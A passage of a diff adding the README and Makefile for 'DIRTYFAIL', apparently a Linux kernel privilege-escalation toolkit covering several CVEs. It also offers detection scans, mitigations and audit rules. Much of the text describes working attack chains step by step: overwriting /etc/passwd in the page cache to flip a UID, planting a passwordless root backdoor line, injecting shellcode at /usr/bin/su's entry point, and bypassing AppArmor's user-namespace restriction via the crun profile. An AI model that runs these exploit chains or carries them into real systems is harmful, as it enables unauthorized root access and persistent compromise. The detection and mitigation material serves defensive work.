β”‚ backdoor for β”‚ + β”‚ * fork_arm β”‚ β”‚ parent stays β”‚ β”‚ arbitrary-byte β”‚ + β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ in init ns, β”‚ β”‚ writes β”‚ + β”‚ β”‚ child re-execs β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ β”‚ via change_ β”‚ β”‚ + β–Ό β”‚ onexec(crun) + β”‚ β–Ό + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ AA stage 1/2 β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ stage 1/2 β”‚ β”‚ unshare + caps β”‚ β”‚ AF_ALG ecb(aes) β”‚ + β”‚ handler β”‚ β”‚ β†’ run inner β”‚ β”‚ keystream brute β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ force β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + + Per-CVE primitives (each has detect/exploit/exploit_inner functions): + + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ copyfail.c algif_aead authencesn 4-byte STORE (CVE-2026-31431) β”‚ + β”‚ copyfail_gcm.c rfc4106(gcm(aes)) 1-byte STORE (CVE-2026-43284) β”‚ + β”‚ dirtyfrag_esp.c xfrm-ESP IPv4 4-byte STORE (CVE-2026-43284) β”‚ + β”‚ dirtyfrag_esp6.c xfrm-ESP IPv6 4-byte STORE w/ +9 (CVE-2026-43284) β”‚ + β”‚ dirtyfrag_rxrpc.c rxkad 8-byte STORE + fcrypt brute (CVE-2026-43500) β”‚ + β”‚ fcrypt.c rxkad cipher (56-bit Feistel) β”‚ + β”‚ backdoor.c persistent /etc/passwd line overwrite β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ +``` + +**Key design decisions:** + +- **Outer/inner split**: every exploit forks a child for the kernel + work. Parent stays in init namespace so the eventual `execlp("su", + user)` reaches REAL init-ns root. 
See [Β§8.5 + Architecture](#85-architecture-outerinner-fork-based-bypass). +- **Page cache is global**: child writes from inside its bypass userns, + parent reads from init ns; same bytes visible. +- **Env vars carry parent β†’ child state**: `DIRTYFAIL_INNER_MODE`, + `DIRTYFAIL_TARGET_USER`, `DIRTYFAIL_K_{A,B,C}` (rxrpc), + `DIRTYFAIL_LINE_OFF` etc. (backdoor). `execv` preserves the + environment across stage transitions. +- **Defensive companion**: `--mitigate` deploys the same blacklists + + sysctl hardening that distros ship as official mitigations. + `--scan` detects when caps are LSM-blocked and reports + "mitigated" rather than misleading "VULNERABLE preconditions met". + +--- + +## 5. Build + +### Prerequisites + +* **Linux** (this binary is Linux-only at runtime). +* `gcc` or `clang`, `make`. +* Linux UAPI headers β€” specifically ``, ``, + ``, ``. + +| Distro | Install | +|-------------------|------------------------------------------------------| +| Debian / Ubuntu | `sudo apt install build-essential linux-libc-dev` | +| RHEL / CentOS | `sudo dnf install gcc make kernel-headers glibc-devel` | +| Fedora | `sudo dnf install gcc make kernel-headers` | +| Arch | `sudo pacman -S base-devel` | + +### Build commands + +```sh +git clone https://github.com//DIRTYFAIL.git +cd DIRTYFAIL +make # release build β†’ ./dirtyfail +make debug # -O0 -g3 for gdb +make static # static link (musl-gcc recommended) +make clean +``` + +The default build produces a single ~80 KB binary at `./dirtyfail`. +For a portable build that runs on any kernel-compatible Linux without +glibc dependency drift: + +```sh +make static CC=musl-gcc +``` + +(install `musl-tools` on Debian/Ubuntu, or build musl from source). + +--- + +## 6. 
Usage + +`./dirtyfail --help` is the canonical reference; the modes broken +out by category: + +**Detection (safe; no system modification):** + +| Mode | What it does | +|---|---| +| `--scan` | Run all five detectors (default mode) | +| `--scan --active` | Add a sentinel-file STORE probe per CVE β€” distinguishes preconds-met from actually-exploitable | +| `--scan --json` | Emit a single JSON object on stdout (SIEM-friendly); logs go to stderr | +| `--check-copyfail` / `--check-esp` / `--check-esp6` / `--check-rxrpc` / `--check-gcm` | Per-CVE detection only | + +**Exploitation (typed-confirmation gated; corrupts `/etc/passwd` page cache):** + +| Mode | What it does | +|---|---| +| `--exploit-copyfail` | UID flip via `algif_aead` 4-byte primitive | +| `--exploit-esp` | UID flip via xfrm-ESP v4 (needs userns+CAP_NET_ADMIN) | +| `--exploit-esp6` | UID flip via xfrm-ESP v6 | +| `--exploit-rxrpc` | Empty root password field via rxkad fcrypt brute force | +| `--exploit-gcm` | UID flip via `rfc4106(gcm(aes))` single-byte primitive | +| `--exploit-backdoor` | PERSISTENT: insert `dirtyfail::0:0:...:/:/bin/bash` | +| `--exploit-su` | V4bel-style: plant arch-specific shellcode at `/usr/bin/su` entry point. x86_64 tested end-to-end; aarch64 ships hardware-untested (gated behind `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1`) | + +**Cleanup / state inspection:** + +| Mode | What it does | +|---|---| +| `--cleanup` | Evict `/etc/passwd` from page cache (`fadvise` + `drop_caches` if root) | +| `--cleanup-backdoor` | Restore the original `/etc/passwd` line from state file | +| `--cleanup-su` | Restore `/usr/bin/su` entry-point bytes from state file | +| `--list-state` | Report what (if anything) is currently planted; side-effect-free | + +**Defensive (root required):** + +| Mode | What it does | +|---|---| +| `--mitigate` | Blacklist `algif_aead`/`esp4`/`esp6`/`rxrpc` modules; set `apparmor_restrict_unprivileged_userns=1`; drop_caches. 
Side-effects: breaks IPsec, AFS | +| `--cleanup-mitigate` | Remove the modprobe/sysctl files installed by `--mitigate` | + +**Common options:** + +| Flag | Effect | +|---|---| +| `--no-shell` | After a successful exploit, do NOT `execve su` β€” verify and revert | +| `--no-revert` | With `--no-shell`, also skip the auto-revert (used by the container-escape demo) | +| `--active` | Add active sentinel-STORE probes to `--scan`/`--check-*` | +| `--json` | (with `--scan`) emit machine-readable output | +| `--no-color` | Disable ANSI color | +| `--aa-bypass` | (DEBUG only) force the AppArmor unprivileged-userns bypass β€” exploits do this internally, see Β§8.5 | + +### Detection examples + +Plain scan (preconditions only β€” fast, ~1s): + +```sh +./dirtyfail --scan +``` + +Active sentinel probe per CVE (~10s, modifies `/tmp` sentinels only): + +```sh +./dirtyfail --scan --active +``` + +JSON for SIEM/fleet ingestion: + +```sh +$ ./dirtyfail --scan --active --json +{ + "tool": "dirtyfail", + "version": "0.1.0", + "hostname": "server-01", + "kernel": "6.19.10-300.fc44.x86_64", + "machine": "x86_64", + "active_probes": true, + "results": [ + {"cve": "CVE-2026-31431", "name": "copyfail", "status": "vulnerable"}, + {"cve": "CVE-2026-43284", "name": "dirtyfrag-esp", "status": "vulnerable"}, + {"cve": "CVE-2026-43284-v6", "name": "dirtyfrag-esp6", "status": "vulnerable"}, + {"cve": "CVE-2026-43500", "name": "dirtyfrag-rxrpc", "status": "vulnerable"}, + {"cve": "CVE-2026-31431-gcm", "name": "copyfail-gcm", "status": "vulnerable"} + ], + "summary": "vulnerable" +} +``` + +Status values: `vulnerable`, `not_vulnerable`, `preconds_missing`, +`test_error`. The summary echoes the worst across results. 
+ +### Exploit examples (typed confirmation required) + +```sh +./dirtyfail --exploit-copyfail # UID-flip + drop into root via su +./dirtyfail --exploit-su # plant /bin/sh shellcode at /usr/bin/su entry +./dirtyfail --exploit-copyfail --no-shell # plant + verify + auto-revert (CI-safe) +``` + +Each exploit prompts for `DIRTYFAIL` + (where applicable) +`YES_BREAK_SSH` before any page-cache modification. + +### State inspection + cleanup + +```sh +./dirtyfail --list-state # what's currently planted? (side-effect free) +./dirtyfail --cleanup # fadvise(DONTNEED) + drop_caches if root +./dirtyfail --cleanup-backdoor # restore /etc/passwd from .dirtyfail.state +./dirtyfail --cleanup-su # restore /usr/bin/su from .dirtyfail-su.state +``` + +Or fall through to the kernel directly: + +```sh +sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' +``` + +--- + +## 7. How DIRTYFAIL detects each CVE + +### Copy Fail (active sentinel probe) + +Detection actually triggers the primitive against a sentinel file in +`/tmp`: + +1. Probe `socket(AF_ALG, SOCK_SEQPACKET, 0)` and `bind` to + `authencesn(hmac(sha256), cbc(aes))`. +2. Create a 4 KiB sentinel file in `/tmp` and fault its first page + into the cache. +3. Run the full exploit primitive against it: `sendmsg` AAD with + `seqno_lo = "PWND"`, splice 32 bytes of the sentinel into the AF_ALG + op socket, drive `recv` to fire the scratch write. +4. Re-read the sentinel and look for `PWND` anywhere in the first + page. + +Marker found β‡’ vulnerable. Marker absent but page contents differ β‡’ +the primitive partially fired (still vulnerable). Page identical β‡’ +not vulnerable on this kernel. + +### Dirty Frag xfrm-ESP (precondition-based β€” or active with `--active`) + +Default `--scan` is precondition-only β€” we don't enter a user +namespace in detect mode (it would side-effect networking inside +that namespace). 
We check: + +* kernel version within affected window +* `esp4` / `esp6` currently loaded or autoloadable +* unprivileged user namespace creation succeeds (probed via fork β†’ + child `unshare(CLONE_NEWUSER)`) +* AppArmor `apparmor_userns_caps_blocked()` returns false + +All four present β‡’ VULNERABLE (preconditions met). + +`--scan --active` extends this with a sentinel-STORE probe: we fork +a child that arms the AA bypass, enters a fresh user/net namespace, +registers an XFRM SA, and fires the ESP-in-UDP trigger against a +`/tmp/dirtyfail-esp-probe.XXXXXX` sentinel file. The parent re-reads +the sentinel and looks for the marker bytes: + +* marker landed β†’ kernel STORE is reachable β†’ **VULNERABLE** +* page intact β†’ kernel patch is in effect β†’ **NOT VULNERABLE** +* AA bypass denied β†’ **PRECOND_FAIL** (LSM-mitigated) + +This is the only way to distinguish a backported-patched kernel +from an unpatched one without running the full UID-flip exploit +against `/etc/passwd`. The same pattern is used for ESP v6, RxRPC, +and GCM under `--active`. + +### Dirty Frag RxRPC (precondition-based β€” or active with `--active`) + +Preconditions: +* `rxrpc` in `/proc/modules` or autoloadable +* `socket(AF_RXRPC, SOCK_DGRAM, 0)` succeeds + +Active probe (`--active`): forks via AA bypass, registers an rxrpc +session key with an arbitrary 8-byte value, sends one CHALLENGE + +DATA forgery against a `/tmp` sentinel, looks for ANY byte change +inside the spliced 8-byte window. We don't try to predict what +landed β€” any modification confirms the kernel STORE fires. + +### Copy Fail GCM variant + ESP v6 β€” same shape + +The GCM variant active probe installs a transport-mode SA with an +arbitrary IV and fires `gcm_trigger` against a `/tmp` sentinel; ANY +byte change at sentinel[0] confirms reachability. 
The ESP v6 probe +also auto-calibrates `V6_STORE_SHIFT` per kernel build (see +`calibrate_v6_shift` in `src/dirtyfrag_esp6.c`) β€” different distros' +`esp6_input` builds put the STORE at slightly different offsets +inside the spliced region, and the calibration probe discovers the +exact offset before the real exploit fires. + +--- + +## 8. How DIRTYFAIL exploits each CVE + +### Copy Fail exploit (`copyfail.c`) + +Single 4-byte STORE through `algif_aead`: + +``` + [/etc/passwd page cache] + user ──sendmsg(AAD = SPI||"0000")──▢ AF_ALG op + ──splice(passwd_fd, 32B)──────▢ AF_ALG op (in-place dst SGL) + ──recv()─────────────────────▢ kernel runs authencesn_decrypt + scratch write: "0000" β†’ uid_off + EBADMSG returned to user (we ignore) + user ──open(passwd, RDONLY)─read──▢ "kara:x:0000:1000:..." ◄─ page cache + user ──execlp("su", "kara")──────▢ PAM βœ“ on /etc/shadow β†’ setuid(0) + ─────► root shell +``` + +### Dirty Frag xfrm-ESP exploit (`dirtyfrag_esp.c`) + +Same end-state as Copy Fail, reached through `xfrm_input` instead of +`algif_aead`: + +``` + [/etc/passwd page cache] + unshare(USER|NET); setup uid_map; ifup lo + NETLINK_XFRM ─NEWSA(seq_hi="0000", encap=ESPINUDP/4500)─▢ kernel + udp_recv bind 127.0.0.1:4500, UDP_ENCAP_ESPINUDP + udp_send connect 127.0.0.1:4500 + vmsplice ESP wire header (24B) ─▢ pipe + splice /etc/passwd@uid_off (16B) ─▢ pipe + splice pipe (40B) ─▢ udp_send + udp loopback ─▢ udp_recv (UDP_ENCAP) ─▢ xfrm_input ─▢ esp_input + skb has frags, no frag_list ─▢ goto skip_cow (THE BUG) + crypto_authenc_esn_decrypt: + scratch_write(seq_hi="0000" β†’ page_addr+uid_off) ◄─ 4-byte STORE + AEAD auth fails (EBADMSG) β€” but the STORE is permanent + page-cache copy of /etc/passwd now reports uid 0 for the user +``` + +Then exit the namespace, `execlp("su", user)` from the parent β€” same +final step as Copy Fail. 
+ +### Dirty Frag RxRPC exploit (`dirtyfrag_rxrpc.c` + `fcrypt.c`) + +``` + [/etc/passwd page cache] + user-space brute force of K_A, K_B, K_C such that fcrypt_decrypt(C, K) + produces predicate-satisfying plaintexts for offsets 4, 6, 8 + (chained-ciphertext correction across passes) + + fork β†’ child enters new userns: + unshare(USER|NET); setup uid_map; ifup lo + socket(AF_RXRPC) β€” autoload rxrpc.ko + for each (off, K) in [(4,K_A), (6,K_B), (8,K_C)]: + add_key("rxrpc", "df-evil", v1_token{session_key=K}) + udp_srv = bind 127.0.0.1:port_S + rxsk = AF_RXRPC + SECURITY_KEY=df-evil + bind :port_C + rxsk β†’ sendmsg(PINGPING) triggers handshake init + udp_srv ← receives kernel's first DATA-0 + extract (epoch, cid, callNumber) + udp_srv β†’ forged CHALLENGE β†’ rxsk auto-RESPONSE + primes conn->rxkad.cipher with K + csum_iv = AF_ALG pcbc(fcrypt)(epoch||cid||0||sec_ix, IV=K) + cksum_h = AF_ALG pcbc(fcrypt)(call_id||x, IV=csum_iv)[1] >> 16 + vmsplice DATA hdr (28B) β†’ pipe + splice /etc/passwd@off (8B) β†’ pipe + splice pipe (36B) β†’ udp_srv + udp loopback β†’ rxsk + recvmsg β†’ rxrpc_input β†’ rxkad_verify_packet + skb has frags, no frag_list β†’ goto skip_unshare (THE BUG) + skcipher_request_set_crypt(req, sg=page+off, sg=page+off, 8, iv=0) + crypto_skcipher_decrypt: pcbc(fcrypt) + page[off..off+8] = fcrypt_decrypt(C_actual, K) ◄─ 8-byte STORE + + child exits, parent verifies /etc/passwd[4..5] == "::" + parent: execlp("su", "-") + PAM common-auth: pam_unix.so nullok β†’ root has empty password + su β†’ setresuid(0,0,0) β†’ exec /bin/bash + ─────► root shell +``` + +### `--exploit-su` shellcode injection (`exploit_su.c`) + +A second `/etc/passwd`-free attack chain modeled on V4bel's reference +exploit. 
Instead of editing `/etc/passwd`'s page cache, we plant +arch-specific shellcode at `/usr/bin/su`'s ELF entry point in its +page cache; the next time anyone exec's `/usr/bin/su`, the kernel +sets euid=0 from the on-disk setuid bit, the dynamic linker +resolves, and control transfers to our shellcode β†’ `/bin/sh` as +real init-ns root. No PAM dependency, bypasses `pam_unix nullok` +removal entirely. + +``` +parent (init ns) + β”‚ stat /usr/bin/su; verify setuid+root + β”‚ parse ELF header; resolve e_entry β†’ file offset + β”‚ pread() N bytes at file_offset β†’ /var/tmp/.dirtyfail-su.state + β”‚ for each 4-byte chunk of shellcode: + β”‚ cf_4byte_write("/usr/bin/su", file_offset+i, chunk) + β”‚ pread() back; verify match + β”‚ if --no-shell: + β”‚ plant_shellcode(original) # revert via re-write + β”‚ fadvise(DONTNEED) on a new fd # evict if possible + β”‚ else: + β”‚ execl("/usr/bin/su", "su", NULL) ─► + β”‚ kernel exec /usr/bin/su (setuid root) + β”‚ ld-linux.so resolves + β”‚ jumps to e_entry β†’ our shellcode + β”‚ setuid(0); setgid(0); + β”‚ execve("/bin/sh", argv, NULL) + β–Ό ────► root shell +``` + +Architecture matrix: + +* **x86_64 (56 bytes, 14 chained 4-byte writes)** β€” tested + end-to-end on Fedora 44 (`uid=0(root) gid=0(root) ... + context=unconfined_u:unconfined_r:unconfined_t`). Shellcode in + `shellcode_x86_64[]`. +* **aarch64 (80 bytes, 20 instructions)** β€” hand-encoded from the + ARMv8-A reference, **never executed on hardware**. Gated behind + `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1`. Source ships in + `tools/exploit_su_aarch64.S` for community verification β€” assemble + with `aarch64-linux-gnu-as` and confirm the byte sequence matches + `shellcode_aarch64[]`. +* anything else β†’ preconds_fail. + +The state file `/var/tmp/.dirtyfail-su.state` stashes the original +entry-point bytes so `--cleanup-su` can restore. `--list-state` +inspects this file (and the backdoor's) without touching anything. 
+ +If the verify step finds the page cache doesn't match the planted +shellcode (kernel patched, AF_ALG blacklisted, etc.), the auto-revert +fires immediately and the state file is removed β€” no need for the +operator to run cleanup-su afterward. + +--- + +## 8.5 Architecture: outer/inner fork-based bypass + +All five exploit modes share a common architecture for handling +Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy without +trapping the post-exploit `su` inside a userns where it can't reach +real init-ns root. + +### The problem + +A naive bypass puts the *whole* `dirtyfail` process inside a fresh +user namespace via `unshare(CLONE_NEWUSER)`. That's enough to register +XFRM SAs and fire splice triggers β€” but it also means the eventual +`execlp("su", user)` runs inside the userns, where uid 0 is mapped via +`uid_map "0 1000 1"` to the operator's outer uid (1000). PAM's +`setresuid(0)` then lands at userns-uid-0-mapped-to-1000, which is +**not** real init-ns root β€” `cat /etc/shadow` returns EACCES, the +shell can't actually do privileged operations. + +### The fix: outer/inner split + +``` +parent (dirtyfail, init ns) child (bypass userns) +───────────────────────── ───────────────────── +prompts (DIRTYFAIL / YES_BREAK_SSH) +resolve target (uid_off, K_A/K_B/K_C, ...) +setenv DIRTYFAIL_INNER_MODE=... +setenv DIRTYFAIL_TARGET_USER=... +fork ─────────────────────────────────────► change_onexec("crun") + execv self ─► STAGE-1 + execv self ─► STAGE-2 + unshare(USER|NET) + uid_map / capset + ifup lo + main() detects INNER_MODE + dispatch _inner() + register XFRM SA + splice trigger β†’ page cache STORE + _exit(DF_EXPLOIT_OK) +waitpid ◄───────────────────────────────── (child reaped) +read /etc/passwd (page cache is global) +verify modification visible +if do_shell: + execlp("su", user) ← runs IN INIT NS + PAM auth β†’ setresuid(0) + β†’ REAL init-ns root shell +else: + try_revert_passwd_page_cache +``` + +The parent **never enters a user namespace**. 
The child does the +bypass + kernel work, modifies the global page cache (which is shared +across namespaces β€” the only "bridge" we need), and exits. The +parent's `su` is then a normal init-namespace setresuid call. + +### Parent β†’ child handoff via env vars + +`execv` preserves the environment, so the parent stashes the +operation parameters in env vars before forking. Each mode defines +its own: + +| Mode | Env vars | +|---|---| +| `esp` / `esp6` / `gcm` | `DIRTYFAIL_INNER_MODE`, `DIRTYFAIL_TARGET_USER` | +| `rxrpc` | `DIRTYFAIL_INNER_MODE=rxrpc`, `DIRTYFAIL_K_{A,B,C}` (hex) β€” fcrypt brute force happens in the parent (no caps needed); the keys are passed to the child for the actual triggers | +| `backdoor-install` / `backdoor-cleanup` | `DIRTYFAIL_INNER_MODE`, `DIRTYFAIL_LINE_OFF`, `VICTIM_LINE`, `TARGET_LINE` | + +After stage 2 of the bypass completes, `main()` checks +`DIRTYFAIL_INNER_MODE` and dispatches to `_exploit_inner()`. The +inner does *only* the kernel work (no prompts, no fork, no `su`) and +exits with the result code. The parent reaps it via `waitpid` and +proceeds with verification. + +### Why the single-hop bypass + +The earlier two-hop dance (`change_onexec("crun")` β†’ `change_onexec("chrome")`) +caused intermittent `ENOSPC` failures on Ubuntu 24.04 in our exec +chain (likely a per-profile userns-accounting wrinkle). The single +hop into `crun` is sufficient β€” `crun`'s AppArmor profile has +`flags=(unconfined)` and explicit `userns,` permission, so unshare +succeeds and stays succeeded. + +### Why no infinite re-exec loop + +After stage 2 completes successfully, a process-local +`g_bypass_done` flag is set. If `apparmor_bypass_needed()` is called +again in the same process, it short-circuits to `false`, preventing +the post-exploit code from re-arming and nesting another userns +layer (which previously hit the per-userns nesting cap as `ENOSPC`). 
+ +### `--aa-bypass` is now a debug-only flag + +In the old architecture, `--aa-bypass` armed a whole-process bypass +before the exploit dispatch. In the new architecture, exploit modes +do their *own* fork-based bypass internally; the flag is no longer +needed for normal use. It's retained for debugging the bypass +mechanics in isolation (e.g. running `--scan` inside a bypass +userns), with a warning that it may break post-exploit `su`. + +--- + +## 9. Mitigations + +### Copy Fail (CVE-2026-31431) + +1. **Apply the patch.** Mainline `a664bf3d`; backports landed on the + 6.12 / 6.17 / 6.18 stable lines. +2. **Interim**: blacklist `algif_aead`: + ```sh + echo 'install algif_aead /bin/false' | sudo tee /etc/modprobe.d/copyfail.conf + sudo rmmod algif_aead 2>/dev/null + ``` + ⚠ Note: this **does not** mitigate Dirty Frag. The xfrm-ESP path + reaches the same authencesn primitive without going through + algif_aead. + +### Dirty Frag xfrm-ESP (CVE-2026-43284) + +1. **Apply the patch.** Mainline `f4c50a4034e6` (merged 2026-05-07). + Distro backports rolling out as of 2026-05-08. +2. **Interim**: blacklist `esp4` and `esp6`: + ```sh + sudo tee /etc/modprobe.d/dirtyfrag-esp.conf <<'EOF' + install esp4 /bin/false + install esp6 /bin/false + EOF + sudo rmmod esp4 esp6 2>/dev/null + sudo sysctl vm.drop_caches=3 + ``` + ⚠ This breaks IPsec / strongSwan / libreswan VPNs. +3. **Defense in depth**: disallow unprivileged user namespaces. + Ubuntu does this by default via AppArmor; on other distros: + ```sh + sudo sysctl -w kernel.unprivileged_userns_clone=0 + ``` + +### Dirty Frag RxRPC (CVE-2026-43500) + +1. **No upstream patch yet.** Researcher patch on lkml; not merged at + time of writing (2026-05-08). +2. **Interim**: blacklist `rxrpc`: + ```sh + sudo tee /etc/modprobe.d/dirtyfrag-rxrpc.conf <<'EOF' + install rxrpc /bin/false + EOF + sudo rmmod rxrpc 2>/dev/null + sudo sysctl vm.drop_caches=3 + ``` + ⚠ This breaks AFS distributed file system clients. 
Most servers + don't need rxrpc. + +### Combined one-liner (all three) + +```sh +sudo sh -c ' +cat > /etc/modprobe.d/dirtyfail.conf <<EOF +install algif_aead /bin/false +install esp4 /bin/false +install esp6 /bin/false +install rxrpc /bin/false +EOF +rmmod algif_aead esp4 esp6 rxrpc 2>/dev/null +sysctl vm.drop_caches=3 +' +``` + +### Or use `dirtyfail --mitigate` + +The same set of mitigations is wrapped in a typed-confirmation gated +defensive mode: + +```sh +sudo ./dirtyfail --mitigate +``` + +This drops in `/etc/modprobe.d/dirtyfail-mitigations.conf` and +`/etc/sysctl.d/99-dirtyfail-mitigations.conf`, unloads the four +modules, and `drop_caches`. Reverts via `sudo ./dirtyfail +--cleanup-mitigate`. Side-effects: breaks IPsec, AFS clients, and +any userspace using `AF_ALG` AEAD. See `docs/DEFENDERS.md` for the +full sysadmin playbook. + +### Detection / monitoring + +For ongoing detection independent of patching: + +* **Scan a host:** `dirtyfail --scan --active` (full sentinel-STORE + probe) or `dirtyfail --scan --active --json` for SIEM/fleet + ingestion. The `tools/dirtyfail-check.sh` bash variant has zero + build dependencies. +* **Audit rules:** `tools/99-dirtyfail.rules` is a drop-in auditd + ruleset covering the five syscall paths the exploit chain uses + (XFRM netlink registration, `add_key("rxrpc")`, + `unshare(CLONE_NEWUSER)`, `AF_ALG` socket creation, + `/etc/passwd`/`/etc/shadow` writes). Install with: + ```sh + sudo install -m 0640 tools/99-dirtyfail.rules /etc/audit/rules.d/ + sudo augenrules --load && sudo systemctl restart auditd + ``` +* **Container blast-radius demo:** + `tools/dirtyfail-container-escape.sh` shows that the kernel page + cache is shared across namespaces — useful for explaining the + cross-tenant impact to operators. + +--- + +## 10. Ethics & disclosure + +DIRTYFAIL is a research tool. The vulnerabilities it covers are +**already publicly disclosed** with weaponized PoCs in the wild +(see [Credits](#11-credits)) — DIRTYFAIL adds detection coverage, +unified documentation, and a gentler PoC variant (UID-flip vs ELF +overwrite of `/usr/bin/su`).
+ +* **Do not run `--exploit-*` modes on systems you do not own or are + not explicitly authorized to test.** Page-cache modifications are + reversible with `drop_caches`, but they are still privilege + escalation while they persist. +* **Do not deploy DIRTYFAIL as a "scanner" against third-party + infrastructure** without written authorization. The detection mode + is non-modifying for system files but does open a sentinel file in + `/tmp` and exercise the kernel crypto API. +* If you find a vulnerable system in the wild, follow responsible + disclosure to the operator, not the public. + +--- + +## Bonus: notes on the GCM variant + backdoor + AppArmor bypass + +These three features extend DIRTYFAIL with techniques first published +by **0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo**. Reimplemented +in DIRTYFAIL style; original credit lives in `NOTICE.md`. + +### Copy Fail GCM variant + +Same xfrm-ESP no-COW path as CVE-2026-43284, but using +`rfc4106(gcm(aes))` instead of `authencesn(...)`. Two reasons it's +worth shipping alongside the authencesn variant: + +1. **Coverage.** A defender who blacklisted `algif_aead` to mitigate + Copy Fail (CVE-2026-31431) is still vulnerable here β€” the GCM + path doesn't go through algif_aead. +2. **Granularity.** AES-GCM in counter mode XORs keystream onto the + spliced byte. By brute-forcing the IV (~256 trials per byte) we + land an arbitrary single byte at any file offset β€” no 4-byte + alignment, no 4-byte side-effects. + +The 1-byte primitive (`cfg_1byte_write`) is what makes the persistent +backdoor mode feasible. + +### Persistent backdoor + +`--exploit-backdoor` picks the longest `/etc/passwd` line whose shell +is in `{nologin, false, sync}` and overwrites it byte-by-byte with +`dirtyfail::0:0::/:/bin/bash` (length-matched). After installation, +`su - dirtyfail` from any user drops a root shell β€” no password prompt β€” +because `pam_unix.so nullok` accepts the empty password field. 
+ +The username `dirtyfail` is intentionally branded to this project so +it's *easy to detect* in any subsequent audit β€” defenders running +`grep dirtyfail /etc/passwd` (or any HIDS doing the same) will spot +the line immediately. If you need a different identifier for a +specific red-team engagement, change `NEW_USER` and `DF_PREFIX` in +`src/backdoor.c`. + +The on-disk file is unchanged; the substitution lives in the page +cache only. `--cleanup-backdoor` restores the original line via the +same primitive. + +### AppArmor bypass + +Ubuntu 24.04+ ships `apparmor_restrict_unprivileged_userns=1`. The +default profile applied to unprivileged binaries lets `unshare(USER)` +succeed but **strips CAP_NET_ADMIN** in the new namespace. XFRM SA +registration then fails silently. + +The bypass: write `"exec crun"` to `/proc/self/attr/exec` and +`execv` to switch into AppArmor's `crun` profile, which has +`flags=(unconfined)` and explicit `userns,` permission. After the +exec, `unshare(CLONE_NEWUSER | CLONE_NEWNET)` succeeds with full +caps inside the new namespace. + +DIRTYFAIL handles this *per-exploit-mode* via a fork: parent stays +in init namespace, child does the bypass + kernel work, parent +reads global page cache and runs `su` for real init-ns root. See +[Β§8.5 Architecture](#85-architecture-outerinner-fork-based-bypass) +for the full chain. The legacy `--aa-bypass` flag (which armed the +bypass for the whole process) is retained for debugging only. + +The original technique is from `aa-rootns.c` by 0xdeadbeefnetwork +(credited there to Brad Spengler / grsecurity). DIRTYFAIL's +implementation: + +- Detects the restriction via the + `kernel.apparmor_restrict_unprivileged_userns` sysctl rather than + by reading `/proc/self/attr/current` (which still shows + "unconfined" on Ubuntu 24.04 even when the policy is restricting). 
+- Uses a single hop into `crun` rather than the two-hop + `crun β†’ chrome` dance β€” the second hop caused intermittent + `ENOSPC` on Ubuntu 24.04. +- Sets a process-local `g_bypass_done` flag after stage 2 so re-checks + short-circuit (preventing infinite re-exec loops that previously + exhausted the per-userns nesting cap). + +--- + +## 11. Credits + +DIRTYFAIL is original code, but the techniques it implements were +developed by the researchers below. Read their primary sources before +deploying this tool β€” they are the canonical references. + +| Source | Researcher | Contribution | +|--------|------------|--------------| +| | Anonymous | Original Copy Fail disclosure | +| | Smarttfoxx | C PoC (shellcode-in-`su` variant) | +| | rootsecdev | Python detector + UID-flip PoC; the ergonomics of DIRTYFAIL's `--exploit-copyfail` mode follow this approach. | +| | Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) | Dirty Frag discovery, full chain PoC, kernel patches | +| | 0xdeadbeefnetwork | GCM-variant exploit, IPv6 PoC, AppArmor userns bypass technique | +| | BleepingComputer | Public reporting | + +Patch authors: + +* `f4c50a4034e6` (Dirty Frag xfrm-ESP) β€” based on Hyunwoo Kim's v1 + patch, with the merged shared-frag approach by Kuan-Ting Chen. +* RxRPC patch β€” Hyunwoo Kim, pending merge. + +--- + +## License + +MIT. See [LICENSE](LICENSE). + +--- + +## Contact + +Open an issue on this repository, or reach out at the address listed +in the commit history. For coordinated disclosure of related issues, +contact the upstream researchers above directly. diff --git a/modules/copy_fail_family/Makefile b/modules/copy_fail_family/Makefile new file mode 100644 index 0000000..517f63a --- /dev/null +++ b/modules/copy_fail_family/Makefile @@ -0,0 +1,93 @@ +# DIRTYFAIL β€” Makefile +# +# Builds a single statically-linked binary `dirtyfail` from src/*.c. 
